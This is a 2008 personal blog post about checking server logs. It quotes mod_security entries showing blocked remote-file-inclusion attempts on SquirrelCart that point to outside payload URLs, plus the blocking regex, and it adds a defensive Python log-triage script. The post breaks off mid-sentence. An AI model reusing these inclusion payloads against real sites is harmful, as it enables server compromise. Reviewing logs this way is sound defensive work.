Do you check your log files?

by keif on September 8, 2008

Over the past few days, I’ve been having a helluva time with Dreamhost (my host) and a slow connection.

I tweeted about it. A lot. Twitter helps me vent, m’kay?

OMG, like what did you do?

Well, I figured Dreamhost had bitten off more than it could chew – and I still wonder about it, since they’re offering “unlimited everything” yet my server is under constant overload. For months.

Once it was finally back up, and I installed a new theme (see my footer? Thesis? Very cool), I started poking around in my log files because my brand-spankin’-new theme was being all screwy.

That’s when I noticed this little gem:

[Sat Sep 06 22:20:11 2008] [error] [client 75.127.70.16] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "/2008/07/12/the-problem-with-web-developer...-web-put-your-title-here//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "dOpSw9BhtwYAAAAlJCcAAAAQ"]

[Sat Sep 06 22:20:11 2008] [error] [client 75.127.70.16] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "dO0Bl9BhtwYAAFGfJx8AAAAH"]

[Sat Sep 06 22:23:46 2008] [error] [client 85.17.6.7] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "/2008/07/12/the-problem-with-web-developer...-web-put-your-title-here//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "gbt0DNBhtwYAAHmKI-oAAAAK"]

[Sat Sep 06 22:23:46 2008] [error] [client 85.17.6.7] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "gcDBS9BhtwYAAF5AN8sAAAAW"]

[Sat Sep 06 22:35:24 2008] [error] [client 81.182.252.176] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "//squirrelcart/cart_content.php?cart_isp_root=http://www.venturesnowboards.com/blid.txt????"] [unique_id "q1bSu9BhtwYAAHBNTxoAAAAD"]

[Sat Sep 06 22:56:20 2008] [error] [client 81.182.252.176] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "/2008/07/12/the-problem-with-web-developer...-web-put-your-title-here//squirrelcart/cart_content.php?cart_isp_root=http://www.venturesnowboards.com/blid.txt????"] [unique_id "9jfE6NBhtwYAAAAlJCsAAAAQ"]

[Sat Sep 06 22:56:20 2008] [error] [client 81.182.252.176] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "//squirrelcart/cart_content.php?cart_isp_root=http://www.venturesnowboards.com/blid.txt????"] [unique_id "9j3cHtBhtwYAAFGfJyMAAAAH"]

[Sat Sep 06 23:14:03 2008] [error] [client 62.210.139.66] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "/2008/07/12/the-problem-with-web-developer...-web-put-your-title-here//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "NZeHB9BhtwYAAG6hI-oAAAAM"]

[Sat Sep 06 23:14:05 2008] [error] [client 62.210.139.66] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "/2008/07/12/the-problem-with-web-developer...-web-put-your-title-here//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "NbcYLNBhtwYAAE5XJCEAAAAP"]

[Sat Sep 06 23:14:07 2008] [error] [client 62.210.139.66] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "NdVvSNBhtwYAAF4FlRcAAAAB"]

[Sat Sep 06 23:14:07 2008] [error] [client 62.210.139.66] mod_security: Access denied with code 503. Pattern match "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)" at REQUEST_URI [severity "EMERGENCY"] [hostname "ikeif.net"] [uri "//squirrelcart/cart_content.php?cart_isp_root=http://albcrew.t35.com/pw.txt?"] [unique_id "NdVyIdBhtwYAAFxmJCoAAAAO"]

All I could do is just stare blankly and say “what the fuc|<?!”

Thankfully, my son was asleep and didn’t witness my temper tantrum.

Hackers? Hardly.

I believe the term is “script kiddies” – I’m no hacker by any means myself, but from what I dug up about their “attack” it was using a cheap-ass script to try and execute vulnerabilities. And I noticed SquirrelCart in there as well – how the hell can I not escape Squirrel Cart? Why don’t clients ever listen when you say “it would be beneficial to upgrade?” I digress…
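An added example, not part of the original post: a small Python triage script for error-log entries in the mod_security format shown above, grouping blocked requests by the remote URL they tried to pass in a parameter. The sample lines are constructed (documentation IP ranges and `.example` hosts), and the function names are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Matches the mod_security "Access denied" error-log format shown above.
LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<client>[^\]]+)\] '
    r'mod_security: Access denied with code \d+\. .*?\[uri "(?P<uri>[^"]*)"\]')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)

def remote_includes(line):
    """Return (client, script, param, remote_url) for each URL-valued parameter."""
    m = LINE_RE.match(line)
    if not m:
        return []          # not a mod_security denial; skip
    path, _, query = m["uri"].partition("?")
    script = path.rsplit("/", 1)[-1]
    # Trailing "?" padding is stripped so identical payload URLs group together.
    return [(m["client"], script, key, val.rstrip("?"))
            for key, val in parse_qsl(query, keep_blank_values=True)
            if REMOTE_RE.match(val)]

def summarize(lines):
    """Group blocked attempts by the remote URL the request tried to include."""
    out = defaultdict(lambda: {"hits": 0, "clients": set(), "targets": set()})
    for line in lines:
        for client, script, param, url in remote_includes(line):
            out[url]["hits"] += 1
            out[url]["clients"].add(client)
            out[url]["targets"].add(f"{script}?{param}=")
    return dict(out)

# Constructed sample lines (documentation IPs and .example hosts, not real data).
TEMPLATE = ('[Sat Sep 06 22:20:11 2008] [error] [client {ip}] mod_security: '
            'Access denied with code 503. Pattern match "(root|page)=(http|ftp)" '
            'at REQUEST_URI [severity "EMERGENCY"] [hostname "blog.example"] '
            '[uri "{uri}"] [unique_id "constructed"]')
CART = "//squirrelcart/cart_content.php?cart_isp_root="
SAMPLE = [
    TEMPLATE.format(ip="192.0.2.10", uri="/2008/07/12/a-post" + CART + "http://files.example/pw.txt?"),
    TEMPLATE.format(ip="192.0.2.10", uri=CART + "http://files.example/pw.txt?"),
    TEMPLATE.format(ip="198.51.100.7", uri=CART + "http://files.example/pw.txt?"),
    TEMPLATE.format(ip="203.0.113.5", uri=CART + "http://other.example/blid.txt????"),
    "[Sat Sep 06 22:21:00 2008] [error] [client 192.0.2.10] File does not exist: /favicon.ico",
]

if __name__ == "__main__":
    for url, info in sorted(summarize(SAMPLE).items(), key=lambda kv: -kv[1]["hits"]):
        print(info["hits"], url, sorted(info["clients"]), sorted(info["targets"]))
```

Run against a real error log by passing the open file object to `summarize()`; a payload URL requested by several unrelated client addresses is the signature of an automated scan rather than a targeted visitor.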

The “Hackers” were UNITED ALBANIANS aka ALBOSS PARADISE and a quick Google search turns up a number of other failed attempts:
